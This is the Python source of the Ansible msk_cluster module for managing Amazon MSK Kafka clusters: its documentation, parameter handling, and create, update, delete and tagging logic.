#!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright: (c) 2021, Daniil Kupchenko (@oukooveu)
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)

from __future__ import absolute_import, division, print_function

__metaclass__ = type


DOCUMENTATION = r"""
---
module: msk_cluster
short_description: Manage Amazon MSK clusters
version_added: "2.0.0"
description:
    - Create, delete and modify Amazon MSK (Managed Streaming for Apache Kafka) clusters.
    - Prior to release 5.0.0 this module was called C(community.aws.aws_msk_cluster).
      The usage did not change.
author:
    - Daniil Kupchenko (@oukooveu)
options:
    state:
        description: Create (C(present)) or delete (C(absent)) cluster.
        choices: ['present', 'absent']
        type: str
        default: 'present'
    name:
        description: The name of the cluster.
        required: true
        type: str
    version:
        description:
            - The version of Apache Kafka.
            - This version should exist in given configuration.
            - This parameter is required when I(state=present).
        type: str
    configuration_arn:
        description:
            - ARN of the configuration to use.
            - This parameter is required when I(state=present).
        type: str
    configuration_revision:
        description:
            - The revision of the configuration to use.
            - This parameter is required when I(state=present).
        type: int
    nodes:
        description: The number of broker nodes in the cluster. Should be greater or equal to two.
        type: int
        default: 3
    instance_type:
        description:
            - The type of Amazon EC2 instances to use for Kafka brokers.
        choices:
            - kafka.t3.small
            - kafka.m5.large
            - kafka.m5.xlarge
            - kafka.m5.2xlarge
            - kafka.m5.4xlarge
        default: kafka.t3.small
        type: str
    ebs_volume_size:
        description: The size in GiB of the EBS volume for the data drive on each broker node.
        type: int
        default: 100
    subnets:
        description:
            - The list of subnets to connect to in the client virtual private cloud (VPC).
              AWS creates elastic network interfaces inside these subnets. Client applications use
              elastic network interfaces to produce and consume data.
            - Client subnets can't be in Availability Zone us-east-1e.
            - This parameter is required when I(state=present).
        type: list
        elements: str
    security_groups:
        description:
            - The AWS security groups to associate with the elastic network interfaces in order to specify
              who can connect to and communicate with the Amazon MSK cluster.
              If you don't specify a security group, Amazon MSK uses the default security group associated with the VPC.
        type: list
        elements: str
    encryption:
        description:
            - Includes all encryption-related information.
            - Effective only for new cluster and can not be updated.
        type: dict
        suboptions:
            kms_key_id:
                description:
                    - The ARN of the AWS KMS key for encrypting data at rest. If you don't specify a KMS key, MSK creates one for you and uses it.
                default: Null
                type: str
            in_transit:
                description: The details for encryption in transit.
                type: dict
                suboptions:
                    in_cluster:
                        description:
                            - When set to true, it indicates that data communication among the broker nodes of the cluster is encrypted.
                              When set to false, the communication happens in plaintext.
                        type: bool
                        default: True
                    client_broker:
                        description:
                            - Indicates the encryption setting for data in transit between clients and brokers. The following are the possible values.
                              TLS means that client-broker communication is enabled with TLS only.
                              TLS_PLAINTEXT means that client-broker communication is enabled for both TLS-encrypted, as well as plaintext data.
                              PLAINTEXT means that client-broker communication is enabled in plaintext only.
                        choices:
                            - TLS
                            - TLS_PLAINTEXT
                            - PLAINTEXT
                        type: str
                        default: TLS
    authentication:
        description:
            - Includes all client authentication related information.
            - Effective only for new cluster and can not be updated.
        type: dict
        suboptions:
            tls_ca_arn:
                description: List of ACM Certificate Authority ARNs.
                type: list
                elements: str
            sasl_scram:
                description: SASL/SCRAM authentication is enabled or not.
                type: bool
            sasl_iam:
                version_added: 5.5.0
                description: IAM authentication is enabled or not.
                type: bool
            unauthenticated:
                version_added: 5.5.0
                description: Option to explicitly turn on or off authentication.
                type: bool
                default: True
    enhanced_monitoring:
        description: Specifies the level of monitoring for the MSK cluster.
        choices:
            - DEFAULT
            - PER_BROKER
            - PER_TOPIC_PER_BROKER
            - PER_TOPIC_PER_PARTITION
        default: DEFAULT
        type: str
    open_monitoring:
        description: The settings for open monitoring.
        type: dict
        suboptions:
            jmx_exporter:
                description: Indicates whether you want to enable or disable the JMX Exporter.
                type: bool
                default: False
            node_exporter:
                description: Indicates whether you want to enable or disable the Node Exporter.
                type: bool
                default: False
    logging:
        description: Logging configuration.
        type: dict
        suboptions:
            cloudwatch:
                description: Details of the CloudWatch Logs destination for broker logs.
                type: dict
                suboptions:
                    enabled:
                        description: Specifies whether broker logs get sent to the specified CloudWatch Logs destination.
                        type: bool
                        default: False
                    log_group:
                        description: The CloudWatch log group that is the destination for broker logs.
                        type: str
                        required: False
            firehose:
                description: Details of the Kinesis Data Firehose delivery stream that is the destination for broker logs.
                type: dict
                suboptions:
                    enabled:
                        description: Specifies whether broker logs get sent to the specified Kinesis Data Firehose delivery stream.
                        type: bool
                        default: False
                    delivery_stream:
                        description: The Kinesis Data Firehose delivery stream that is the destination for broker logs.
                        type: str
                        required: False
            s3:
                description: Details of the Amazon S3 destination for broker logs.
                type: dict
                suboptions:
                    enabled:
                        description: Specifies whether broker logs get sent to the specified Amazon S3 destination.
                        type: bool
                        default: False
                    bucket:
                        description: The name of the S3 bucket that is the destination for broker logs.
                        type: str
                        required: False
                    prefix:
                        description: The S3 prefix that is the destination for broker logs.
                        type: str
                        required: False
    wait:
        description: Whether to wait for the cluster to be available or deleted.
        type: bool
        default: false
    wait_timeout:
        description: How many seconds to wait. Cluster creation can take up to 20-30 minutes.
        type: int
        default: 3600
extends_documentation_fragment:
    - amazon.aws.aws
    - amazon.aws.ec2
    - amazon.aws.boto3
    - amazon.aws.tags
notes:
    - All operations are time consuming, for example create takes 20-30 minutes,
      update kafka version -- more than one hour, update configuration -- 10-15 minutes;
    - Cluster's brokers get evenly distributed over a number of availability zones
      that's equal to the number of subnets.
"""

EXAMPLES = r"""
# Note: These examples do not set authentication details, see the AWS Guide for details.

- community.aws.msk_cluster:
    name: kafka-cluster
    state: present
    version: 2.6.1
    nodes: 6
    ebs_volume_size: "{{ aws_msk_options.ebs_volume_size }}"
    subnets:
      - subnet-e3b48ce7c25861eeb
      - subnet-2990c8b25b07ddd43
      - subnet-d9fbeaf46c54bfab6
    wait: true
    wait_timeout: 1800
    configuration_arn: arn:aws:kafka:us-east-1:123456789012:configuration/kafka-cluster-configuration/aaaaaaaa-bbbb-4444-3333-ccccccccc-1
    configuration_revision: 1

- community.aws.msk_cluster:
    name: kafka-cluster
    state: absent
"""

RETURN = r"""
# These are examples of possible return values, and in general should use other names for return values.

bootstrap_broker_string:
    description: A list of brokers that a client application can use to bootstrap.
    type: complex
    contains:
        plain:
            description: A string containing one or more hostname:port pairs.
            type: str
        tls:
            description: A string containing one or more DNS names (or IP) and TLS port pairs.
            type: str
    returned: I(state=present) and cluster state is I(ACTIVE)
cluster_info:
    description: Description of the MSK cluster.
    type: dict
    returned: I(state=present)
response:
    description: The response from actual API call.
    type: dict
    returned: always
    sample: {}
"""

import time

try:
    import botocore
except ImportError:
    pass  # handled by AnsibleAWSModule

from ansible_collections.amazon.aws.plugins.module_utils.core import AnsibleAWSModule
from ansible_collections.amazon.aws.plugins.module_utils.ec2 import (
    camel_dict_to_snake_dict,
    compare_aws_tags,
    AWSRetry,
)


@AWSRetry.jittered_backoff(retries=5, delay=5)
def list_clusters_with_backoff(client, cluster_name):
    """Return the full paginated list_clusters result filtered by cluster name."""
    return (
        client.get_paginator("list_clusters")
        .paginate(ClusterNameFilter=cluster_name)
        .build_full_result()
    )


@AWSRetry.jittered_backoff(retries=5, delay=5)
def list_nodes_with_backoff(client, cluster_arn):
    """Return the full paginated list_nodes result for the given cluster ARN."""
    return (
        client.get_paginator("list_nodes")
        .paginate(ClusterArn=cluster_arn)
        .build_full_result()
    )


def find_cluster_by_name(client, module, cluster_name):
    """Return the ClusterInfo dict for cluster_name, or {} when no cluster matches.

    Fails the module on API errors or when the name filter matches more than
    one cluster (the name is expected to be unique).
    """
    try:
        matches = list_clusters_with_backoff(client, cluster_name).get("ClusterInfoList", [])
    except (
        botocore.exceptions.BotoCoreError,
        botocore.exceptions.ClientError,
    ) as e:
        module.fail_json_aws(e, "Failed to find kafka cluster by name")
    if not matches:
        return {}
    if len(matches) != 1:
        module.fail_json(msg="Found more than one cluster with name '{0}'".format(cluster_name))
    return matches[0]


def get_cluster_state(client, module, arn):
    """Return the cluster's State string, or "DELETED" once the cluster is gone."""
    try:
        described = client.describe_cluster(ClusterArn=arn, aws_retry=True)
    except client.exceptions.NotFoundException:
        # describe_cluster raises NotFound after deletion completes; surface
        # that as the terminal DELETED state so waiters can key off it.
        return "DELETED"
    except (
        botocore.exceptions.BotoCoreError,
        botocore.exceptions.ClientError,
    ) as e:
        module.fail_json_aws(e, "Failed to get kafka cluster state")
    return described["ClusterInfo"]["State"]


def get_cluster_version(client, module, arn):
    """Return the cluster's CurrentVersion token (required by update_* calls)."""
    try:
        described = client.describe_cluster(ClusterArn=arn, aws_retry=True)
    except (
        botocore.exceptions.BotoCoreError,
        botocore.exceptions.ClientError,
    ) as e:
        module.fail_json_aws(e, "Failed to get kafka cluster version")
    return described["ClusterInfo"]["CurrentVersion"]


def wait_for_cluster_state(client, module, arn, state="ACTIVE"):
    """Poll the cluster every 60s until it reaches ``state`` or wait_timeout expires.

    :param arn: ARN of the cluster to poll.
    :param state: desired state, e.g. "ACTIVE" or "DELETED".
    Fails the module (no return) on timeout.
    """
    # As of 2021-06 boto3 doesn't offer any built in waiters
    start = time.time()
    timeout = int(module.params.get("wait_timeout"))
    check_interval = 60
    while True:
        current_state = get_cluster_state(client, module, arn)
        if current_state == state:
            return
        if time.time() - start > timeout:
            # Bug fix: the original formatted the current *state* into the
            # "cluster {0}" placeholder, producing messages like
            # "Timeout waiting for cluster CREATING" with no cluster identity.
            module.fail_json(
                msg="Timeout waiting for cluster {0} (current state is '{1}', desired state is '{2}')".format(
                    arn, current_state, state
                )
            )
        time.sleep(check_interval)


def prepare_create_options(module):
    """
    Return data structure for cluster create operation.

    Builds the boto3 create_cluster keyword arguments from module parameters:
    broker node group, encryption, client authentication, monitoring and
    logging sections.
    """

    c_params = {
        "ClusterName": module.params["name"],
        "KafkaVersion": module.params["version"],
        "ConfigurationInfo": {
            "Arn": module.params["configuration_arn"],
            "Revision": module.params["configuration_revision"],
        },
        "NumberOfBrokerNodes": module.params["nodes"],
        "BrokerNodeGroupInfo": {
            "ClientSubnets": module.params["subnets"],
            "InstanceType": module.params["instance_type"],
        }
    }

    if module.params["security_groups"] and len(module.params["security_groups"]) != 0:
        c_params["BrokerNodeGroupInfo"]["SecurityGroups"] = module.params.get("security_groups")

    if module.params["ebs_volume_size"]:
        c_params["BrokerNodeGroupInfo"]["StorageInfo"] = {
            "EbsStorageInfo": {
                "VolumeSize": module.params.get("ebs_volume_size")
            }
        }

    if module.params["encryption"]:
        c_params["EncryptionInfo"] = {}
        if module.params["encryption"].get("kms_key_id"):
            c_params["EncryptionInfo"]["EncryptionAtRest"] = {
                "DataVolumeKMSKeyId": module.params["encryption"]["kms_key_id"]
            }
        # Robustness fix: "in_transit" may be omitted entirely; previously
        # None.get(...) raised AttributeError. Fall back to documented defaults.
        in_transit = module.params["encryption"].get("in_transit") or {}
        c_params["EncryptionInfo"]["EncryptionInTransit"] = {
            "ClientBroker": in_transit.get("client_broker", "TLS"),
            "InCluster": in_transit.get("in_cluster", True),
        }

    if module.params["authentication"]:
        c_params["ClientAuthentication"] = {}
        if module.params["authentication"].get("sasl_scram") or module.params["authentication"].get("sasl_iam"):
            sasl = {}
            if module.params["authentication"].get("sasl_scram"):
                sasl["Scram"] = {"Enabled": True}
            if module.params["authentication"].get("sasl_iam"):
                sasl["Iam"] = {"Enabled": True}
            c_params["ClientAuthentication"]["Sasl"] = sasl
        if module.params["authentication"].get("tls_ca_arn"):
            c_params["ClientAuthentication"]["Tls"] = {
                "CertificateAuthorityArnList": module.params["authentication"]["tls_ca_arn"],
                "Enabled": True,
            }
        if module.params["authentication"].get("unauthenticated"):
            # Bug fix: the original *replaced* the whole ClientAuthentication
            # dict here, silently discarding any Sasl/Tls settings built above
            # (and "unauthenticated" defaults to True, so this always fired).
            # Only add the Unauthenticated key.
            c_params["ClientAuthentication"]["Unauthenticated"] = {"Enabled": True}

    c_params.update(prepare_enhanced_monitoring_options(module))
    c_params.update(prepare_open_monitoring_options(module))
    c_params.update(prepare_logging_options(module))

    return c_params


def prepare_enhanced_monitoring_options(module):
    """Return the EnhancedMonitoring section, falling back to "DEFAULT"."""
    level = module.params["enhanced_monitoring"] or "DEFAULT"
    return {"EnhancedMonitoring": level}


def prepare_open_monitoring_options(module):
    """Return the OpenMonitoring (Prometheus exporters) section.

    Exporters not present in the module options are emitted as disabled.
    """
    settings = module.params["open_monitoring"] or {}
    jmx_enabled = settings.get("jmx_exporter", False)
    node_enabled = settings.get("node_exporter", False)
    return {
        "OpenMonitoring": {
            "Prometheus": {
                "JmxExporter": {"EnabledInBroker": jmx_enabled},
                "NodeExporter": {"EnabledInBroker": node_enabled},
            }
        }
    }


def prepare_logging_options(module):
    """Return the LoggingInfo section covering CloudWatch, Firehose and S3 sinks.

    Every destination that is not configured is emitted explicitly disabled,
    matching the API's expectation of a complete BrokerLogs structure.
    """
    logging_opts = module.params["logging"] or {}
    broker_logs = {}

    cloudwatch = logging_opts.get("cloudwatch")
    if cloudwatch:
        broker_logs["CloudWatchLogs"] = {
            "Enabled": cloudwatch.get("enabled"),
            "LogGroup": cloudwatch.get("log_group"),
        }
    else:
        broker_logs["CloudWatchLogs"] = {"Enabled": False}

    firehose = logging_opts.get("firehose")
    if firehose:
        broker_logs["Firehose"] = {
            "Enabled": firehose.get("enabled"),
            "DeliveryStream": firehose.get("delivery_stream"),
        }
    else:
        broker_logs["Firehose"] = {"Enabled": False}

    s3 = logging_opts.get("s3")
    if s3:
        broker_logs["S3"] = {
            "Enabled": s3.get("enabled"),
            "Bucket": s3.get("bucket"),
            "Prefix": s3.get("prefix"),
        }
    else:
        broker_logs["S3"] = {"Enabled": False}

    return {"LoggingInfo": {"BrokerLogs": broker_logs}}


def create_or_update_cluster(client, module):
    """
    Create new or update existing cluster

    Returns a (changed, response) tuple. ``response`` carries the cluster ARN;
    on the update path it also contains a ``changes`` dict keyed by the name
    of each update performed.
    """

    changed = False
    response = {}

    cluster = find_cluster_by_name(client, module, module.params["name"])

    if not cluster:

        changed = True

        # Check mode: report that a cluster would be created without calling AWS.
        if module.check_mode:
            return True, {}

        create_params = prepare_create_options(module)

        try:
            response = client.create_cluster(aws_retry=True, **create_params)
        except (
            botocore.exceptions.BotoCoreError,
            botocore.exceptions.ClientError,
        ) as e:
            module.fail_json_aws(e, "Failed to create kafka cluster")

        if module.params.get("wait"):
            wait_for_cluster_state(client, module, arn=response["ClusterArn"], state="ACTIVE")

    else:

        response["ClusterArn"] = cluster["ClusterArn"]
        response["changes"] = {}

        # prepare available update methods definitions with current/target values and options
        msk_cluster_changes = {
            "broker_count": {
                "current_value": cluster["NumberOfBrokerNodes"],
                "target_value": module.params.get("nodes"),
                "update_params": {
                    "TargetNumberOfBrokerNodes": module.params.get("nodes")
                }
            },
            "broker_storage": {
                "current_value": cluster["BrokerNodeGroupInfo"]["StorageInfo"]["EbsStorageInfo"]["VolumeSize"],
                "target_value": module.params.get("ebs_volume_size"),
                "update_params": {
                    "TargetBrokerEBSVolumeInfo": [
                        {"KafkaBrokerNodeId": "All", "VolumeSizeGB": module.params.get("ebs_volume_size")}
                    ]
                }
            },
            "broker_type": {
                "current_value": cluster["BrokerNodeGroupInfo"]["InstanceType"],
                "target_value": module.params.get("instance_type"),
                "update_params": {
                    "TargetInstanceType": module.params.get("instance_type")
                }
            },
            "cluster_configuration": {
                "current_value": {
                    "arn": cluster["CurrentBrokerSoftwareInfo"]["ConfigurationArn"],
                    "revision": cluster["CurrentBrokerSoftwareInfo"]["ConfigurationRevision"],
                },
                "target_value": {
                    "arn": module.params.get("configuration_arn"),
                    "revision": module.params.get("configuration_revision"),
                },
                "update_params": {
                    "ConfigurationInfo": {
                        "Arn": module.params.get("configuration_arn"),
                        "Revision": module.params.get("configuration_revision")
                    }
                }
            },
            "cluster_kafka_version": {
                "current_value": cluster["CurrentBrokerSoftwareInfo"]["KafkaVersion"],
                "target_value": module.params.get("version"),
                "update_params": {
                    "TargetKafkaVersion": module.params.get("version")
                }
            },
            "enhanced_monitoring": {
                "current_value": cluster["EnhancedMonitoring"],
                "target_value": module.params.get("enhanced_monitoring"),
                "update_method": "update_monitoring",
                "update_params": prepare_enhanced_monitoring_options(module)
            },
            "open_monitoring": {
                "current_value": {
                    "OpenMonitoring": cluster["OpenMonitoring"]
                },
                "target_value": prepare_open_monitoring_options(module),
                "update_method": "update_monitoring",
                "update_params": prepare_open_monitoring_options(module)
            },
            "logging": {
                "current_value": {
                    "LoggingInfo": cluster["LoggingInfo"]
                },
                "target_value": prepare_logging_options(module),
                "update_method": "update_monitoring",
                "update_params": prepare_logging_options(module)
            }
        }

        for method, options in msk_cluster_changes.items():

            # NOTE(review): no entry above currently sets 'botocore_version';
            # this guard is retained for update methods gated on a minimum
            # botocore release.
            if 'botocore_version' in options:
                if not module.botocore_at_least(options["botocore_version"]):
                    continue

            try:
                # Client method defaults to "update_<key>" unless an explicit
                # "update_method" override is given (e.g. update_monitoring).
                update_method = getattr(client, options.get("update_method", "update_" + method))
            except AttributeError as e:
                module.fail_json_aws(e, "There is no update method 'update_{0}'".format(method))

            if options["current_value"] != options["target_value"]:
                changed = True
                if module.check_mode:
                    return True, {}

                # need to get cluster version and check for the state because
                # there can be several updates requested but only one in time can be performed
                version = get_cluster_version(client, module, cluster["ClusterArn"])
                state = get_cluster_state(client, module, cluster["ClusterArn"])
                if state != "ACTIVE":
                    if module.params["wait"]:
                        wait_for_cluster_state(client, module, arn=cluster["ClusterArn"], state="ACTIVE")
                    else:
                        module.fail_json(
                            msg="Cluster can be updated only in active state, current state is '{0}'. check cluster state or use wait option".format(
                                state
                            )
                        )
                try:
                    response["changes"][method] = update_method(
                        ClusterArn=cluster["ClusterArn"],
                        CurrentVersion=version,
                        **options["update_params"]
                    )
                except (
                    botocore.exceptions.BotoCoreError,
                    botocore.exceptions.ClientError,
                ) as e:
                    module.fail_json_aws(
                        e, "Failed to update cluster via 'update_{0}'".format(method)
                    )

                # Each successful update must settle back to ACTIVE before the
                # next one can be applied.
                if module.params["wait"]:
                    wait_for_cluster_state(client, module, arn=cluster["ClusterArn"], state="ACTIVE")

    changed |= update_cluster_tags(client, module, response["ClusterArn"])

    return changed, response


def update_cluster_tags(client, module, arn):
    """Reconcile the cluster's tags with the module's tags/purge_tags parameters.

    Returns True when any tag was added or removed; False when tags were not
    specified or already match.
    """
    desired = module.params.get('tags')
    if desired is None:
        return False
    purge = module.params.get('purge_tags')

    try:
        current = client.list_tags_for_resource(ResourceArn=arn, aws_retry=True)['Tags']
    except (botocore.exceptions.ClientError, botocore.exceptions.BotoCoreError) as e:
        module.fail_json_aws(e, msg="Unable to retrieve tags for cluster '{0}'".format(arn))

    to_add, to_remove = compare_aws_tags(current, desired, purge_tags=purge)

    if not module.check_mode:
        try:
            if to_remove:
                client.untag_resource(ResourceArn=arn, TagKeys=to_remove, aws_retry=True)
            if to_add:
                client.tag_resource(ResourceArn=arn, Tags=to_add, aws_retry=True)
        except (botocore.exceptions.ClientError, botocore.exceptions.BotoCoreError) as e:
            module.fail_json_aws(e, msg="Unable to set tags for cluster '{0}'".format(arn))

    return bool(to_add) or bool(to_remove)


def delete_cluster(client, module):
    """Delete the named cluster when it exists.

    Returns a (changed, response) tuple; response is {} when nothing existed.
    """
    cluster = find_cluster_by_name(client, module, module.params["name"])

    # Check mode: report only whether a deletion would occur.
    if module.check_mode:
        return (True, cluster) if cluster else (False, {})

    if not cluster:
        return False, {}

    try:
        response = client.delete_cluster(
            ClusterArn=cluster["ClusterArn"],
            CurrentVersion=cluster["CurrentVersion"],
        )
    except (botocore.exceptions.BotoCoreError, botocore.exceptions.ClientError) as e:
        module.fail_json_aws(e, "Failed to delete kafka cluster")

    if module.params["wait"]:
        wait_for_cluster_state(client, module, arn=cluster["ClusterArn"], state="DELETED")

    # A deleted cluster has no brokers left to bootstrap from.
    response["bootstrap_broker_string"] = {}

    return True, response


def main():
    """Module entry point: validate parameters, then create/update or delete
    the MSK cluster and exit with cluster info and bootstrap broker strings.
    """

    module_args = dict(
        name=dict(type="str", required=True),
        state=dict(type="str", choices=["present", "absent"], default="present"),
        version=dict(type="str"),
        configuration_arn=dict(type="str"),
        configuration_revision=dict(type="int"),
        nodes=dict(type="int", default=3),
        instance_type=dict(
            choices=[
                "kafka.t3.small",
                "kafka.m5.large",
                "kafka.m5.xlarge",
                "kafka.m5.2xlarge",
                "kafka.m5.4xlarge",
            ],
            default="kafka.t3.small",
        ),
        ebs_volume_size=dict(type="int", default=100),
        subnets=dict(type="list", elements="str"),
        security_groups=dict(type="list", elements="str", required=False),
        encryption=dict(
            type="dict",
            options=dict(
                kms_key_id=dict(type="str", required=False),
                in_transit=dict(
                    type="dict",
                    options=dict(
                        in_cluster=dict(type="bool", default=True),
                        client_broker=dict(
                            choices=["TLS", "TLS_PLAINTEXT", "PLAINTEXT"],
                            default="TLS"
                        ),
                    ),
                ),
            ),
        ),
        authentication=dict(
            type="dict",
            options=dict(
                tls_ca_arn=dict(type="list", elements="str", required=False),
                sasl_scram=dict(type="bool", required=False),
                sasl_iam=dict(type="bool", required=False),
                unauthenticated=dict(type="bool", default=True, required=False),
            ),
        ),
        enhanced_monitoring=dict(
            choices=[
                "DEFAULT",
                "PER_BROKER",
                "PER_TOPIC_PER_BROKER",
                "PER_TOPIC_PER_PARTITION",
            ],
            default="DEFAULT",
            required=False,
        ),
        open_monitoring=dict(
            type="dict",
            options=dict(
                jmx_exporter=dict(type="bool", default=False),
                node_exporter=dict(type="bool", default=False),
            ),
        ),
        logging=dict(
            type="dict",
            options=dict(
                cloudwatch=dict(
                    type="dict",
                    options=dict(
                        enabled=dict(type="bool", default=False),
                        log_group=dict(type="str", required=False),
                    ),
                ),
                firehose=dict(
                    type="dict",
                    options=dict(
                        enabled=dict(type="bool", default=False),
                        delivery_stream=dict(type="str", required=False),
                    ),
                ),
                s3=dict(
                    type="dict",
                    options=dict(
                        enabled=dict(type="bool", default=False),
                        bucket=dict(type="str", required=False),
                        prefix=dict(type="str", required=False),
                    ),
                ),
            ),
        ),
        wait=dict(type="bool", default=False),
        wait_timeout=dict(type="int", default=3600),
        tags=dict(type='dict', aliases=['resource_tags']),
        purge_tags=dict(type='bool', default=True),
    )

    module = AnsibleAWSModule(
        argument_spec=module_args,
        required_if=[['state', 'present', ['version', 'configuration_arn', 'configuration_revision', 'subnets']]],
        supports_check_mode=True
    )

    client = module.client("kafka", retry_decorator=AWSRetry.jittered_backoff())

    if module.params["state"] == "present":
        # MSK requires broker nodes spread over at least two AZs, and the
        # node count must be a multiple of the number of subnets (AZs).
        if len(module.params["subnets"]) < 2:
            module.fail_json(
                msg="At least two client subnets should be provided"
            )
        if int(module.params["nodes"]) % int(len(module.params["subnets"])) != 0:
            module.fail_json(
                msg="The number of broker nodes must be a multiple of availability zones in the subnets parameter"
            )
        if len(module.params["name"]) > 64:
            # BUGFIX: the original nested module.fail_json() inside another
            # module.fail_json() call; a single call with msg= is correct.
            module.fail_json(
                msg='Cluster name "{0}" exceeds 64 character limit'.format(module.params["name"])
            )
        changed, response = create_or_update_cluster(client, module)
    elif module.params["state"] == "absent":
        changed, response = delete_cluster(client, module)

    cluster_info = {}
    bootstrap_broker_string = {}
    if response.get("ClusterArn") and module.params["state"] == "present":
        try:
            cluster_info = client.describe_cluster(ClusterArn=response["ClusterArn"], aws_retry=True)[
                "ClusterInfo"
            ]
            # Bootstrap broker strings are only available once the cluster
            # is ACTIVE; requesting them earlier would fail.
            if cluster_info.get("State") == "ACTIVE":
                brokers = client.get_bootstrap_brokers(ClusterArn=response["ClusterArn"], aws_retry=True)
                if brokers.get("BootstrapBrokerString"):
                    bootstrap_broker_string["plain"] = brokers["BootstrapBrokerString"]
                if brokers.get("BootstrapBrokerStringTls"):
                    bootstrap_broker_string["tls"] = brokers["BootstrapBrokerStringTls"]
        except (
            botocore.exceptions.BotoCoreError,
            botocore.exceptions.ClientError,
        ) as e:
            module.fail_json_aws(
                e,
                "Can not obtain information about cluster {0}".format(
                    response["ClusterArn"]
                ),
            )

    module.exit_json(
        changed=changed,
        bootstrap_broker_string=bootstrap_broker_string,
        cluster_info=camel_dict_to_snake_dict(cluster_info),
        response=camel_dict_to_snake_dict(response),
    )


if __name__ == "__main__":
    main()

Filemanager

Name Type Size Permission Actions
__pycache__ Folder 0755
__init__.py File 0 B 0644
accessanalyzer_validate_policy_info.py File 8.57 KB 0644
acm_certificate.py File 21.94 KB 0644
acm_certificate_info.py File 9.61 KB 0644
api_gateway.py File 12.97 KB 0644
api_gateway_domain.py File 12.43 KB 0644
application_autoscaling_policy.py File 22.77 KB 0644
autoscaling_complete_lifecycle_action.py File 2.88 KB 0644
autoscaling_instance_refresh.py File 9.89 KB 0644
autoscaling_instance_refresh_info.py File 7.21 KB 0644
autoscaling_launch_config.py File 24.4 KB 0644
autoscaling_launch_config_find.py File 6.45 KB 0644
autoscaling_launch_config_info.py File 6.78 KB 0644
autoscaling_lifecycle_hook.py File 10.57 KB 0644
autoscaling_policy.py File 23.13 KB 0644
autoscaling_scheduled_action.py File 9.42 KB 0644
aws_region_info.py File 3.06 KB 0644
batch_compute_environment.py File 15.81 KB 0644
batch_job_definition.py File 15.89 KB 0644
batch_job_queue.py File 9.5 KB 0644
cloudformation_exports_info.py File 2.11 KB 0644
cloudformation_stack_set.py File 31.98 KB 0644
cloudfront_distribution.py File 98.71 KB 0644
cloudfront_distribution_info.py File 28.98 KB 0644
cloudfront_invalidation.py File 10 KB 0644
cloudfront_origin_access_identity.py File 9.38 KB 0644
cloudfront_response_headers_policy.py File 10.55 KB 0644
codebuild_project.py File 18.98 KB 0644
codecommit_repository.py File 7.94 KB 0644
codepipeline.py File 10.71 KB 0644
config_aggregation_authorization.py File 5.11 KB 0644
config_aggregator.py File 7.95 KB 0644
config_delivery_channel.py File 7.68 KB 0644
config_recorder.py File 7.7 KB 0644
config_rule.py File 9.85 KB 0644
data_pipeline.py File 20.86 KB 0644
directconnect_confirm_connection.py File 5.47 KB 0644
directconnect_connection.py File 12.34 KB 0644
directconnect_gateway.py File 13.25 KB 0644
directconnect_link_aggregation_group.py File 17.75 KB 0644
directconnect_virtual_interface.py File 17.79 KB 0644
dms_endpoint.py File 22.77 KB 0644
dms_replication_subnet_group.py File 7.58 KB 0644
dynamodb_table.py File 35.98 KB 0644
dynamodb_ttl.py File 4.61 KB 0644
ec2_ami_copy.py File 6.98 KB 0644
ec2_customer_gateway.py File 7.89 KB 0644
ec2_customer_gateway_info.py File 4.59 KB 0644
ec2_launch_template.py File 35.09 KB 0644
ec2_placement_group.py File 7.33 KB 0644
ec2_placement_group_info.py File 3.12 KB 0644
ec2_snapshot_copy.py File 5.41 KB 0644
ec2_transit_gateway.py File 17.24 KB 0644
ec2_transit_gateway_info.py File 8.87 KB 0644
ec2_transit_gateway_vpc_attachment.py File 10.92 KB 0644
ec2_transit_gateway_vpc_attachment_info.py File 5.61 KB 0644
ec2_vpc_egress_igw.py File 6.15 KB 0644
ec2_vpc_nacl.py File 21.18 KB 0644
ec2_vpc_nacl_info.py File 7.17 KB 0644
ec2_vpc_peer.py File 20.84 KB 0644
ec2_vpc_peering_info.py File 8.97 KB 0644
ec2_vpc_vgw.py File 19.07 KB 0644
ec2_vpc_vgw_info.py File 5.68 KB 0644
ec2_vpc_vpn.py File 31.5 KB 0644
ec2_vpc_vpn_info.py File 7.29 KB 0644
ec2_win_password.py File 6.92 KB 0644
ecs_attribute.py File 9.78 KB 0644
ecs_cluster.py File 13.19 KB 0644
ecs_ecr.py File 21.46 KB 0644
ecs_service.py File 52.33 KB 0644
ecs_service_info.py File 8.5 KB 0644
ecs_tag.py File 7.35 KB 0644
ecs_task.py File 17.41 KB 0644
ecs_taskdefinition.py File 52.04 KB 0644
ecs_taskdefinition_info.py File 13.78 KB 0644
efs.py File 28.21 KB 0644
efs_info.py File 12.85 KB 0644
efs_tag.py File 5.45 KB 0644
eks_cluster.py File 9.62 KB 0644
eks_fargate_profile.py File 11.73 KB 0644
eks_nodegroup.py File 26.17 KB 0644
elasticache.py File 19.82 KB 0644
elasticache_info.py File 17.68 KB 0644
elasticache_parameter_group.py File 13.25 KB 0644
elasticache_snapshot.py File 6.82 KB 0644
elasticache_subnet_group.py File 7.56 KB 0644
elasticbeanstalk_app.py File 7.15 KB 0644
elb_classic_lb_info.py File 7.48 KB 0644
elb_instance.py File 14.27 KB 0644
elb_network_lb.py File 19.14 KB 0644
elb_target.py File 11.59 KB 0644
elb_target_group.py File 43.95 KB 0644
elb_target_group_info.py File 11.46 KB 0644
elb_target_info.py File 15.78 KB 0644
glue_connection.py File 15.36 KB 0644
glue_crawler.py File 15.58 KB 0644
glue_job.py File 18.09 KB 0644
iam_access_key.py File 9.94 KB 0644
iam_access_key_info.py File 3.56 KB 0644
iam_group.py File 16.21 KB 0644
iam_managed_policy.py File 14.16 KB 0644
iam_mfa_device_info.py File 2.92 KB 0644
iam_password_policy.py File 7.15 KB 0644
iam_role.py File 29.67 KB 0644
iam_role_info.py File 9.36 KB 0644
iam_saml_federation.py File 9.01 KB 0644
iam_server_certificate.py File 12.14 KB 0644
iam_server_certificate_info.py File 4.85 KB 0644
inspector_target.py File 7.73 KB 0644
kinesis_stream.py File 40.98 KB 0644
lightsail.py File 10.15 KB 0644
lightsail_static_ip.py File 3.89 KB 0644
msk_cluster.py File 31.56 KB 0644
msk_config.py File 9.28 KB 0644
networkfirewall.py File 11.7 KB 0644
networkfirewall_info.py File 7.24 KB 0644
networkfirewall_policy.py File 16.36 KB 0644
networkfirewall_policy_info.py File 8.78 KB 0644
networkfirewall_rule_group.py File 32.96 KB 0644
networkfirewall_rule_group_info.py File 17.8 KB 0644
opensearch.py File 55.85 KB 0644
opensearch_info.py File 19.48 KB 0644
